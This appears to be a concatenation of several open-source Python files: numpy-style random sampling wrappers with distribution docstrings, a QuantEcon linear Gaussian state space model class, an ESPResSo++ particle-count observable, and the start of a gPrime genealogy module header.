Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
See Also
--------
scipy.stats.distributions.lomax.pdf : probability density function,
distribution or cumulative density function, etc.
scipy.stats.distributions.genpareto.pdf : probability density function,
distribution or cumulative density function, etc.
Notes
-----
The probability density for the Pareto distribution is
.. math:: p(x) = \frac{am^a}{x^{a+1}}
where :math:`a` is the shape and :math:`m` the scale.
The Pareto distribution, named after the Italian economist
Vilfredo Pareto, is a power law probability distribution
useful in many real world problems. Outside the field of
economics it is generally referred to as the Bradford
distribution. Pareto developed the distribution to describe
the distribution of wealth in an economy. It has also found
use in insurance, web page access statistics, oil field sizes,
and many other problems, including the download frequency for
projects in Sourceforge [1]_. It is one of the so-called
"fat-tailed" distributions.
References
----------
.. [1] Francis Hunt and Paul Johnson, On the Pareto Distribution of
Sourceforge projects.
.. [2] Pareto, V. (1896). Course of Political Economy. Lausanne.
.. [3] Reiss, R.D., Thomas, M.(2001), Statistical Analysis of Extreme
Values, Birkhauser Verlag, Basel, pp 23-30.
.. [4] Wikipedia, "Pareto distribution",
http://en.wikipedia.org/wiki/Pareto_distribution
Examples
--------
Draw samples from the distribution:
>>> a, m = 3., 2. # shape and mode
>>> s = (np.random.pareto(a, 1000) + 1) * m
Display the histogram of the samples, along with the probability
density function:
>>> import matplotlib.pyplot as plt
>>> count, bins, _ = plt.hist(s, 100, normed=True)
>>> fit = a*m**a / bins**(a+1)
>>> plt.plot(bins, max(count)*fit/max(fit), linewidth=2, color='r')
>>> plt.show()
"""
return rand.pareto(a=a, size=size)
def samPoisson(lam=1.0, size=None): # real signature unknown; restored from __doc__
"""poisson(lam=1.0, size=None)
Draw samples from a Poisson distribution.
The Poisson distribution is the limit of the binomial distribution
for large N.
Parameters
----------
lam : float or sequence of float
Expectation of interval, should be >= 0. A sequence of expectation
intervals must be broadcastable over the requested size.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
The drawn samples, of shape *size*, if it was provided.
Notes
-----
The Poisson distribution
.. math:: f(k; \lambda)=\frac{\lambda^k e^{-\lambda}}{k!}
For events with an expected separation :math:`\lambda` the Poisson
distribution :math:`f(k; \lambda)` describes the probability of
:math:`k` events occurring within the observed
interval :math:`\lambda`.
Because the output is limited to the range of the C long type, a
ValueError is raised when `lam` is within 10 sigma of the maximum
representable value.
References
----------
.. [1] Weisstein, Eric W. "Poisson Distribution."
From MathWorld--A Wolfram Web Resource.
http://mathworld.wolfram.com/PoissonDistribution.html
.. [2] Wikipedia, "Poisson distribution",
http://en.wikipedia.org/wiki/Poisson_distribution
Examples
--------
Draw samples from the distribution:
>>> import numpy as np
>>> s = np.random.poisson(5, 10000)
Display histogram of the sample:
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, 14, normed=True)
>>> plt.show()
Draw 100 values each for lambda = 100 and 500:
>>> s = np.random.poisson(lam=(100., 500.), size=(100, 2))
"""
return rand.poisson(lam=lam, size=size)
def samPower(a=5.0, size=None): # real signature unknown; restored from __doc__
"""power(a, size=None)
Draws samples in [0, 1] from a power distribution with positive
exponent a - 1.
Also known as the power function distribution.
Parameters
----------
a : float
parameter, > 0
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
The returned samples lie in [0, 1].
Raises
------
ValueError
If a < 1.
Notes
-----
The probability density function is
.. math:: P(x; a) = ax^{a-1}, 0 \le x \le 1, a>0.
The power function distribution is just the inverse of the Pareto
distribution. It may also be seen as a special case of the Beta
distribution.
It is used, for example, in modeling the over-reporting of insurance
claims.
References
----------
.. [1] Christian Kleiber, Samuel Kotz, "Statistical size distributions
in economics and actuarial sciences", Wiley, 2003.
.. [2] Heckert, N. A. and Filliben, James J. "NIST Handbook 148:
Dataplot Reference Manual, Volume 2: Let Subcommands and Library
Functions", National Institute of Standards and Technology
Handbook Series, June 2003.
http://www.itl.nist.gov/div898/software/dataplot/refman2/auxillar/powpdf.pdf
Examples
--------
Draw samples from the distribution:
>>> a = 5. # shape
>>> samples = 1000
>>> s = np.random.power(a, samples)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, bins=30)
>>> x = np.linspace(0, 1, 100)
>>> y = a*x**(a-1.)
>>> normed_y = samples*np.diff(bins)[0]*y
>>> plt.plot(x, normed_y)
>>> plt.show()
Compare the power function distribution to the inverse of the Pareto.
>>> from scipy import stats
>>> rvs = np.random.power(5, 1000000)
>>> rvsp = np.random.pareto(5, 1000000)
>>> xx = np.linspace(0,1,100)
>>> powpdf = stats.powerlaw.pdf(xx,5)
>>> plt.figure()
>>> plt.hist(rvs, bins=50, normed=True)
>>> plt.plot(xx,powpdf,'r-')
>>> plt.title('np.random.power(5)')
>>> plt.figure()
>>> plt.hist(1./(1.+rvsp), bins=50, normed=True)
>>> plt.plot(xx,powpdf,'r-')
>>> plt.title('inverse of 1 + np.random.pareto(5)')
>>> plt.figure()
>>> plt.hist(1./(1.+rvsp), bins=50, normed=True)
>>> plt.plot(xx,powpdf,'r-')
>>> plt.title('inverse of stats.pareto(5)')
"""
return rand.power(a=a, size=size)
def samRayleigh(scale=1.0, size=None): # real signature unknown; restored from __doc__
"""rayleigh(scale=1.0, size=None)
Draw samples from a Rayleigh distribution.
The :math:`\chi` and Weibull distributions are generalizations of the
Rayleigh.
Parameters
----------
scale : scalar
Scale, also equals the mode. Should be >= 0.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Notes
-----
The probability density function for the Rayleigh distribution is
.. math:: P(x;scale) = \frac{x}{scale^2}e^{\frac{-x^2}{2 \cdotp scale^2}}
The Rayleigh distribution would arise, for example, if the East
and North components of the wind velocity had identical zero-mean
Gaussian distributions. Then the wind speed would have a Rayleigh
distribution.
References
----------
.. [1] Brighton Webs Ltd., "Rayleigh Distribution,"
http://www.brighton-webs.co.uk/distributions/rayleigh.asp
.. [2] Wikipedia, "Rayleigh distribution"
http://en.wikipedia.org/wiki/Rayleigh_distribution
Examples
--------
Draw values from the distribution and plot the histogram
>>> import matplotlib.pyplot as plt
>>> values = plt.hist(np.random.rayleigh(3, 100000), bins=200, normed=True)
Wave heights tend to follow a Rayleigh distribution. If the mean wave
height is 1 meter, what fraction of waves are likely to be larger than 3
meters?
>>> meanvalue = 1
>>> modevalue = np.sqrt(2 / np.pi) * meanvalue
>>> s = np.random.rayleigh(modevalue, 1000000)
The percentage of waves larger than 3 meters is:
>>> 100.*sum(s>3)/1000000.
0.087300000000000003
"""
return rand.rayleigh(scale=scale, size=size)
def samTriangular(left=-3, mode=0, right=8, size=None): # real signature unknown; restored from __doc__
"""triangular(left, mode, right, size=None)
Draw samples from the triangular distribution.
The triangular distribution is a continuous probability
distribution with lower limit left, peak at mode, and upper
limit right. Unlike the other distributions, these parameters
directly define the shape of the pdf.
Parameters
----------
left : scalar
Lower limit.
mode : scalar
The value where the peak of the distribution occurs.
The value should fulfill the condition ``left <= mode <= right``.
right : scalar
Upper limit, should be larger than `left`.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
The returned samples all lie in the interval [left, right].
Notes
-----
The probability density function for the triangular distribution is
.. math:: P(x;l, m, r) = \begin{cases}
\frac{2(x-l)}{(r-l)(m-l)}& \text{for $l \leq x \leq m$},\\
\frac{2(m-x)}{(r-l)(r-m)}& \text{for $m \leq x \leq r$},\\
0& \text{otherwise}.
\end{cases}
The triangular distribution is often used in ill-defined
problems where the underlying distribution is not known, but
some knowledge of the limits and mode exists. Often it is used
in simulations.
References
----------
.. [1] Wikipedia, "Triangular distribution"
http://en.wikipedia.org/wiki/Triangular_distribution
Examples
--------
Draw values from the distribution and plot the histogram:
>>> import matplotlib.pyplot as plt
>>> h = plt.hist(np.random.triangular(-3, 0, 8, 100000), bins=200,
... normed=True)
>>> plt.show()
"""
return rand.triangular(left=left, mode=mode, right=right, size=size)
def samUniform(low=0.0, high=1.0, size=None): # real signature unknown; restored from __doc__
"""uniform(low=0.0, high=1.0, size=None)
Draw samples from a uniform distribution.
Samples are uniformly distributed over the half-open interval
``[low, high)`` (includes low, but excludes high). In other words,
any value within the given interval is equally likely to be drawn
by `uniform`.
Parameters
----------
low : float, optional
Lower boundary of the output interval. All values generated will be
greater than or equal to low. The default value is 0.
high : float
Upper boundary of the output interval. All values generated will be
less than high. The default value is 1.0.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
out : ndarray
Drawn samples, with shape `size`.
See Also
--------
randint : Discrete uniform distribution, yielding integers.
random_integers : Discrete uniform distribution over the closed
interval ``[low, high]``.
random_sample : Floats uniformly distributed over ``[0, 1)``.
random : Alias for `random_sample`.
rand : Convenience function that accepts dimensions as input, e.g.,
``rand(2,2)`` would generate a 2-by-2 array of floats,
uniformly distributed over ``[0, 1)``.
Notes
-----
The probability density function of the uniform distribution is
.. math:: p(x) = \frac{1}{b - a}
anywhere within the interval ``[a, b)``, and zero elsewhere.
Examples
--------
Draw samples from the distribution:
>>> s = np.random.uniform(-1,0,1000)
All values are within the given interval:
>>> np.all(s >= -1)
True
>>> np.all(s < 0)
True
Display the histogram of the samples, along with the
probability density function:
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, 15, normed=True)
>>> plt.plot(bins, np.ones_like(bins), linewidth=2, color='r')
>>> plt.show()
"""
return rand.uniform(low=low, high=high, size=size)
def samVonmises(mu=0.0, kappa=4.0, size=None): # real signature unknown; restored from __doc__
"""vonmises(mu, kappa, size=None)
Draw samples from a von Mises distribution.
Samples are drawn from a von Mises distribution with specified mode
(mu) and dispersion (kappa), on the interval [-pi, pi].
The von Mises distribution (also known as the circular normal
distribution) is a continuous probability distribution on the unit
circle. It may be thought of as the circular analogue of the normal
distribution.
Parameters
----------
mu : float
Mode ("center") of the distribution.
kappa : float
Dispersion of the distribution, has to be >=0.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : scalar or ndarray
The returned samples, which are in the interval [-pi, pi].
See Also
--------
scipy.stats.distributions.vonmises : probability density function,
distribution, or cumulative density function, etc.
Notes
-----
The probability density for the von Mises distribution is
.. math:: p(x) = \frac{e^{\kappa \cos(x-\mu)}}{2\pi I_0(\kappa)},
where :math:`\mu` is the mode and :math:`\kappa` the dispersion,
and :math:`I_0(\kappa)` is the modified Bessel function of order 0.
The von Mises is named for Richard Edler von Mises, who was born in
Austria-Hungary, in what is now the Ukraine. He fled to the United
States in 1939 and became a professor at Harvard. He worked in
probability theory, aerodynamics, fluid mechanics, and philosophy of
science.
References
----------
.. [1] Abramowitz, M. and Stegun, I. A. (Eds.). "Handbook of
Mathematical Functions with Formulas, Graphs, and Mathematical
Tables, 9th printing," New York: Dover, 1972.
.. [2] von Mises, R., "Mathematical Theory of Probability
and Statistics", New York: Academic Press, 1964.
Examples
--------
Draw samples from the distribution:
>>> mu, kappa = 0.0, 4.0 # mean and dispersion
>>> s = np.random.vonmises(mu, kappa, 1000)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> from scipy.special import i0
>>> plt.hist(s, 50, normed=True)
>>> x = np.linspace(-np.pi, np.pi, num=51)
>>> y = np.exp(kappa*np.cos(x-mu))/(2*np.pi*i0(kappa))
>>> plt.plot(x, y, linewidth=2, color='r')
>>> plt.show()
"""
return rand.vonmises(mu=mu, kappa=kappa, size=size)
def samWald(mean=3, scale=2, size=None): # real signature unknown; restored from __doc__
"""wald(mean, scale, size=None)
Draw samples from a Wald, or inverse Gaussian, distribution.
As the scale approaches infinity, the distribution becomes more like a
Gaussian. Some references claim that the Wald is an inverse Gaussian
with mean equal to 1, but this is by no means universal.
The inverse Gaussian distribution was first studied in relationship to
Brownian motion. In 1956 M.C.K. Tweedie used the name inverse Gaussian
because there is an inverse relationship between the time to cover a
unit distance and distance covered in unit time.
Parameters
----------
mean : scalar
Distribution mean, should be > 0.
scale : scalar
Scale parameter, should be >= 0.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
Drawn sample, all greater than zero.
Notes
-----
The probability density function for the Wald distribution is
.. math:: P(x;mean,scale) = \sqrt{\frac{scale}{2\pi x^3}} e^{\frac{-scale(x-mean)^2}{2 \cdot mean^2 x}}
As noted above, the inverse Gaussian distribution first arose
from attempts to model Brownian motion. It is also a
competitor to the Weibull for use in reliability modeling and
modeling stock returns and interest rate processes.
References
----------
.. [1] Brighton Webs Ltd., Wald Distribution,
http://www.brighton-webs.co.uk/distributions/wald.asp
.. [2] Chhikara, Raj S., and Folks, J. Leroy, "The Inverse Gaussian
Distribution: Theory : Methodology, and Applications", CRC Press,
1988.
.. [3] Wikipedia, "Wald distribution"
http://en.wikipedia.org/wiki/Wald_distribution
Examples
--------
Draw values from the distribution and plot the histogram:
>>> import matplotlib.pyplot as plt
>>> h = plt.hist(np.random.wald(3, 2, 100000), bins=200, normed=True)
>>> plt.show()
"""
return rand.wald(mean=mean, scale=scale, size=size)
def samWeibull(a=5.0, size=None): # real signature unknown; restored from __doc__
"""weibull(a, size=None)
Draw samples from a Weibull distribution.
Draw samples from a 1-parameter Weibull distribution with the given
shape parameter `a`.
.. math:: X = (-ln(U))^{1/a}
Here, U is drawn from the uniform distribution over (0,1].
The more common 2-parameter Weibull, including a scale parameter
:math:`\lambda` is just :math:`X = \lambda(-ln(U))^{1/a}`.
Parameters
----------
a : float
Shape of the distribution.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray
See Also
--------
scipy.stats.distributions.weibull_max
scipy.stats.distributions.weibull_min
scipy.stats.distributions.genextreme
gumbel
Notes
-----
The Weibull (or Type III asymptotic extreme value distribution
for smallest values, SEV Type III, or Rosin-Rammler
distribution) is one of a class of Generalized Extreme Value
(GEV) distributions used in modeling extreme value problems.
This class includes the Gumbel and Frechet distributions.
The probability density for the Weibull distribution is
.. math:: p(x) = \frac{a}
{\lambda}(\frac{x}{\lambda})^{a-1}e^{-(x/\lambda)^a},
where :math:`a` is the shape and :math:`\lambda` the scale.
The function has its peak (the mode) at
:math:`\lambda(\frac{a-1}{a})^{1/a}`.
When ``a = 1``, the Weibull distribution reduces to the exponential
distribution.
References
----------
.. [1] Waloddi Weibull, Royal Technical University, Stockholm,
1939 "A Statistical Theory Of The Strength Of Materials",
Ingeniorsvetenskapsakademiens Handlingar Nr 151, 1939,
Generalstabens Litografiska Anstalts Forlag, Stockholm.
.. [2] Waloddi Weibull, "A Statistical Distribution Function of
Wide Applicability", Journal Of Applied Mechanics ASME Paper
1951.
.. [3] Wikipedia, "Weibull distribution",
http://en.wikipedia.org/wiki/Weibull_distribution
Examples
--------
Draw samples from the distribution:
>>> a = 5. # shape
>>> s = np.random.weibull(a, 1000)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> x = np.arange(1,100.)/50.
>>> def weib(x,n,a):
... return (a / n) * (x / n)**(a - 1) * np.exp(-(x / n)**a)
>>> count, bins, ignored = plt.hist(np.random.weibull(5.,1000))
>>> x = np.arange(1,100.)/50.
>>> scale = count.max()/weib(x, 1., 5.).max()
>>> plt.plot(x, weib(x, 1., 5.)*scale)
>>> plt.show()
"""
return rand.weibull(a=a, size=size)
def samZipf(a=2.0, size=None): # real signature unknown; restored from __doc__
"""zipf(a, size=None)
Draw samples from a Zipf distribution.
Samples are drawn from a Zipf distribution with specified parameter
`a` > 1.
The Zipf distribution (also known as the zeta distribution) is a
discrete probability distribution that satisfies Zipf's law: the
frequency of an item is inversely proportional to its rank in a
frequency table.
Parameters
----------
a : float > 1
Distribution parameter.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : scalar or ndarray
The returned samples are greater than or equal to one.
See Also
--------
scipy.stats.distributions.zipf : probability density function,
distribution, or cumulative density function, etc.
Notes
-----
The probability density for the Zipf distribution is
.. math:: p(x) = \frac{x^{-a}}{\zeta(a)},
where :math:`\zeta` is the Riemann Zeta function.
It is named for the American linguist George Kingsley Zipf, who noted
that the frequency of any word in a sample of a language is inversely
proportional to its rank in the frequency table.
References
----------
.. [1] Zipf, G. K., "Selected Studies of the Principle of Relative
Frequency in Language," Cambridge, MA: Harvard Univ. Press,
1932.
Examples
--------
Draw samples from the distribution:
>>> a = 2. # parameter
>>> s = np.random.zipf(a, 1000)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> import scipy.special as sps
Truncate s values at 50 so plot is interesting
>>> count, bins, ignored = plt.hist(s[s<50], 50, normed=True)
>>> x = np.arange(1., 50.)
>>> y = x**(-a)/sps.zetac(a)
>>> plt.plot(x, y/max(y), linewidth=2, color='r')
>>> plt.show()
"""
return rand.zipf(a=a, size=size)
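if __name__ == '__main__':
    # Minimal smoke test for the wrappers above (an illustrative sketch, not
    # part of the original module). It only assumes that `rand`, defined near
    # the top of this file, is the numpy.random RandomState-like object these
    # wrappers delegate to.
    import numpy as np
    s = samNormal(loc=0.0, scale=1.0, size=100000)
    assert abs(np.mean(s)) < 0.05 and abs(np.std(s) - 1.0) < 0.05
    e = samExponential(scale=2.0, size=100000)
    assert abs(np.mean(e) - 2.0) < 0.1  # the mean of an exponential equals its scale
    u = samUniform(low=-1.0, high=1.0, size=100000)
    assert np.all(u >= -1.0) and np.all(u < 1.0)  # half-open interval [low, high)
    print('samRandom smoke test passed')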
|
DailyActie/Surrogate-Model
|
surrogate/sampling/samRandom.py
|
Python
|
mit
| 56,444
|
[
"Gaussian"
] |
ffc816185b298a568d71c1cde06ca3414e01ed8c01c9f82ae3e10aca14fc9c0c
|
"""
Filename: lss.py
Reference: http://quant-econ.net/py/linear_models.html
Computes quantities associated with the Gaussian linear state space model.
"""
from textwrap import dedent
import numpy as np
from numpy.random import multivariate_normal
from scipy.linalg import solve
import warnings
#-Check if Numba is Available-#
from .external import numba_installed, jit
def simulate_linear_model(A, x0, v, ts_length):
"""
This is a separate function for simulating a vector linear system of
the form
x_{t+1} = A x_t + v_t given x_0 = x0
Here x_t and v_t are both n x 1 and A is n x n.
The purpose of separating this functionality out is to target it for
optimization by Numba. For the same reason, matrix multiplication is
broken down into for loops.
Parameters
----------
A : array_like or scalar(float)
Should be n x n
x0 : array_like
Should be n x 1. Initial condition
v : np.ndarray
Should be n x ts_length-1. Its t-th column is used as the time t
shock v_t
ts_length : int
The length of the time series
Returns
--------
x : np.ndarray
Time series with ts_length columns, the t-th column being x_t
"""
A = np.asarray(A)
n = A.shape[0]
x = np.empty((n, ts_length))
x[:, 0] = x0
for t in range(ts_length-1):
# x[:, t+1] = A.dot(x[:, t]) + v[:, t]
for i in range(n):
x[i, t+1] = v[i, t]
for j in range(n):
x[i, t+1] += A[i, j] * x[j, t]
return x
if numba_installed:
simulate_linear_model = jit(simulate_linear_model)
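# Illustrative equivalence check (a sketch, not part of the original module):
# the loop-based recursion in simulate_linear_model should match the
# vectorized form x_{t+1} = A x_t + v_t.
def _check_simulate_linear_model():
    A = np.array([[0.5, 0.1], [0.2, 0.3]])
    v = np.random.randn(2, 4)
    x = simulate_linear_model(A, np.ones(2), v, 5)
    for t in range(4):
        assert np.allclose(x[:, t + 1], A.dot(x[:, t]) + v[:, t])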
class LinearStateSpace(object):
"""
A class that describes a Gaussian linear state space model of the
form:
x_{t+1} = A x_t + C w_{t+1}
y_t = G x_t + H v_t
where {w_t} and {v_t} are independent and standard normal with dimensions
k and l respectively. The initial conditions are mu_0 and Sigma_0 for x_0
~ N(mu_0, Sigma_0). When Sigma_0=0, the draw of x_0 is exactly mu_0.
Parameters
----------
A : array_like or scalar(float)
Part of the state transition equation. It should be `n x n`
C : array_like or scalar(float)
Part of the state transition equation. It should be `n x m`
G : array_like or scalar(float)
Part of the observation equation. It should be `k x n`
H : array_like or scalar(float), optional(default=None)
Part of the observation equation. It should be `k x l`
mu_0 : array_like or scalar(float), optional(default=None)
This is the mean of initial draw and is `n x 1`
Sigma_0 : array_like or scalar(float), optional(default=None)
This is the variance of the initial draw and is `n x n` and
also should be positive definite and symmetric
Attributes
----------
A, C, G, H, mu_0, Sigma_0 : see Parameters
n, k, m, l : scalar(int)
The dimensions of x_t, y_t, w_t and v_t respectively
"""
def __init__(self, A, C, G, H=None, mu_0=None, Sigma_0=None):
self.A, self.G, self.C = list(map(self.convert, (A, G, C)))
self.k, self.n = self.G.shape
self.m = self.C.shape[1]
if H is None:
self.H = None
self.l = None
else:
self.H = self.convert(H)
self.l = self.H.shape[1]
if mu_0 is None:
self.mu_0 = np.zeros((self.n, 1))
else:
self.mu_0 = self.convert(mu_0)
self.mu_0.shape = self.n, 1
if Sigma_0 is None:
self.Sigma_0 = np.zeros((self.n, self.n))
else:
self.Sigma_0 = self.convert(Sigma_0)
def __repr__(self):
return self.__str__()
def __str__(self):
m = """\
Linear Gaussian state space model:
- dimension of state space : {n}
- number of innovations : {m}
- dimension of observation equation : {k}
"""
return dedent(m.format(n=self.n, k=self.k, m=self.m))
def convert(self, x):
"""
Convert array_like objects (lists of lists, floats, etc.) into
well formed 2D NumPy arrays
"""
return np.atleast_2d(np.asarray(x, dtype='float32'))
def simulate(self, ts_length=100):
"""
Simulate a time series of length ts_length, first drawing
x_0 ~ N(mu_0, Sigma_0)
Parameters
----------
ts_length : scalar(int), optional(default=100)
The length of the simulation
Returns
-------
x : array_like(float)
An n x ts_length array, where the t-th column is x_t
y : array_like(float)
A k x ts_length array, where the t-th column is y_t
"""
x0 = multivariate_normal(self.mu_0.flatten(), self.Sigma_0)
w = np.random.randn(self.m, ts_length-1)
v = self.C.dot(w) # Multiply each w_t by C to get v_t = C w_t
# == simulate time series == #
x = simulate_linear_model(self.A, x0, v, ts_length)
if self.H is not None:
v = np.random.randn(self.l, ts_length)
y = self.G.dot(x) + self.H.dot(v)
else:
y = self.G.dot(x)
return x, y
def replicate(self, T=10, num_reps=100):
"""
Simulate num_reps observations of x_T and y_T given
x_0 ~ N(mu_0, Sigma_0).
Parameters
----------
T : scalar(int), optional(default=10)
The period that we want to replicate values for
num_reps : scalar(int), optional(default=100)
The number of replications that we want
Returns
-------
x : array_like(float)
An n x num_reps array, where the j-th column is the j-th
observation of x_T
y : array_like(float)
A k x num_reps array, where the j-th column is the j-th
observation of y_T
"""
x = np.empty((self.n, num_reps))
for j in range(num_reps):
x_T, _ = self.simulate(ts_length=T+1)
x[:, j] = x_T[:, -1]
if self.H is not None:
v = np.random.randn(self.l, num_reps)
y = self.G.dot(x) + self.H.dot(v)
else:
y = self.G.dot(x)
return x, y
def moment_sequence(self):
"""
Create a generator to calculate the population mean and
variance-covariance matrix for both x_t and y_t, starting at
the initial condition (self.mu_0, self.Sigma_0). Each iteration
produces a 4-tuple of items (mu_x, mu_y, Sigma_x, Sigma_y) for
the next period.
Yields
------
mu_x : array_like(float)
An n x 1 array representing the population mean of x_t
mu_y : array_like(float)
A k x 1 array representing the population mean of y_t
Sigma_x : array_like(float)
An n x n array representing the variance-covariance matrix
of x_t
Sigma_y : array_like(float)
A k x k array representing the variance-covariance matrix
of y_t
"""
# == Simplify names == #
A, C, G, H = self.A, self.C, self.G, self.H
# == Initial moments == #
mu_x, Sigma_x = self.mu_0, self.Sigma_0
while True:
mu_y = G.dot(mu_x)
if H is None:
Sigma_y = G.dot(Sigma_x).dot(G.T)
else:
Sigma_y = G.dot(Sigma_x).dot(G.T) + H.dot(H.T)
yield mu_x, mu_y, Sigma_x, Sigma_y
# == Update moments of x == #
mu_x = A.dot(mu_x)
Sigma_x = A.dot(Sigma_x).dot(A.T) + C.dot(C.T)
def stationary_distributions(self, max_iter=200, tol=1e-5):
"""
Compute the moments of the stationary distributions of x_t and
y_t if possible. Computation is by iteration, starting from the
initial conditions self.mu_0 and self.Sigma_0
Parameters
----------
max_iter : scalar(int), optional(default=200)
The maximum number of iterations allowed
tol : scalar(float), optional(default=1e-5)
The tolerance level that one wishes to achieve
Returns
-------
mu_x_star : array_like(float)
An n x 1 array representing the stationary mean of x_t
mu_y_star : array_like(float)
A k x 1 array representing the stationary mean of y_t
Sigma_x_star : array_like(float)
An n x n array representing the stationary var-cov matrix
of x_t
Sigma_y_star : array_like(float)
An k x k array representing the stationary var-cov matrix
of y_t
"""
# == Initialize iteration == #
m = self.moment_sequence()
mu_x, mu_y, Sigma_x, Sigma_y = next(m)
i = 0
error = tol + 1
# == Loop until convergence or failure == #
while error > tol:
if i > max_iter:
fail_message = 'Convergence failed after {} iterations'
raise ValueError(fail_message.format(max_iter))
else:
i += 1
mu_x1, mu_y1, Sigma_x1, Sigma_y1 = next(m)
error_mu = np.max(np.abs(mu_x1 - mu_x))
error_Sigma = np.max(np.abs(Sigma_x1 - Sigma_x))
error = max(error_mu, error_Sigma)
mu_x, Sigma_x = mu_x1, Sigma_x1
# == Prepare return values == #
mu_x_star, Sigma_x_star = mu_x, Sigma_x
mu_y_star, Sigma_y_star = mu_y1, Sigma_y1
return mu_x_star, mu_y_star, Sigma_x_star, Sigma_y_star
def geometric_sums(self, beta, x_t):
"""
Forecast the geometric sums
S_x := E [sum_{j=0}^{\infty} beta^j x_{t+j} | x_t ]
S_y := E [sum_{j=0}^{\infty} beta^j y_{t+j} | x_t ]
Parameters
----------
beta : scalar(float)
Discount factor, in [0, 1)
x_t : array_like(float)
The term x_t for conditioning
Returns
-------
S_x : array_like(float)
Geometric sum as defined above
S_y : array_like(float)
Geometric sum as defined above
"""
I = np.identity(self.n)
S_x = solve(I - beta * self.A, x_t)
S_y = self.G.dot(S_x)
return S_x, S_y
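if __name__ == '__main__':
    # Illustrative usage sketch (not part of the original module): a scalar
    # AR(1) state process x_{t+1} = 0.9 x_t + 0.1 w_{t+1}, observed without
    # noise (y_t = x_t).
    _check_simulate_linear_model()
    ss = LinearStateSpace([[0.9]], [[0.1]], [[1.0]], mu_0=[[0.0]])
    x, y = ss.simulate(ts_length=500)
    mu_x, mu_y, Sigma_x, Sigma_y = ss.stationary_distributions()
    # For this AR(1), the stationary variance is C^2/(1 - A^2) = 0.01/0.19, about 0.0526
    print(ss)
    print(Sigma_x)
    # Expected discounted sums conditional on the last simulated state
    S_x, S_y = ss.geometric_sums(beta=0.95, x_t=x[:, -1])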
|
dingliumath/quant-econ
|
quantecon/lss.py
|
Python
|
bsd-3-clause
| 10,481
|
[
"Gaussian"
] |
e923c035361c63ae10c015aeae3248355765a940f8c91675f087d94ffba8f108
|
# Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
r"""
*****************************
**espressopp.analysis.NPart**
*****************************
.. function:: espressopp.analysis.NPart(system)
:param system:
:type system:
"""
from espressopp.esutil import cxxinit
from espressopp import pmi
from espressopp.analysis.Observable import *
from _espressopp import analysis_NPart
class NPartLocal(ObservableLocal, analysis_NPart):
def __init__(self, system):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
cxxinit(self, analysis_NPart, system)
if pmi.isController :
class NPart(Observable):
__metaclass__ = pmi.Proxy
pmiproxydefs = dict(
cls = 'espressopp.analysis.NPartLocal'
)
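# Illustrative usage (a sketch with assumptions: a fully configured `system`
# built via espressopp.System(), with storage and particles already added;
# Observable subclasses expose a compute() method):
#
# npart = espressopp.analysis.NPart(system)
# print npart.compute() # total number of particles in the system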
|
capoe/espressopp.soap
|
src/analysis/NPart.py
|
Python
|
gpl-3.0
| 1,624
|
[
"ESPResSo"
] |
c022a59e5387f84e29fdc6cc73b28a569e2383031bc5895460814b5620f36fd2
|
#
# gPrime - A web-based genealogy program
#
# Copyright (C) 2002-2007 Donald N. Allingham
# Copyright (C) 2007-2008 Brian G. Matherly
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from ....const import LOCALE as glocale
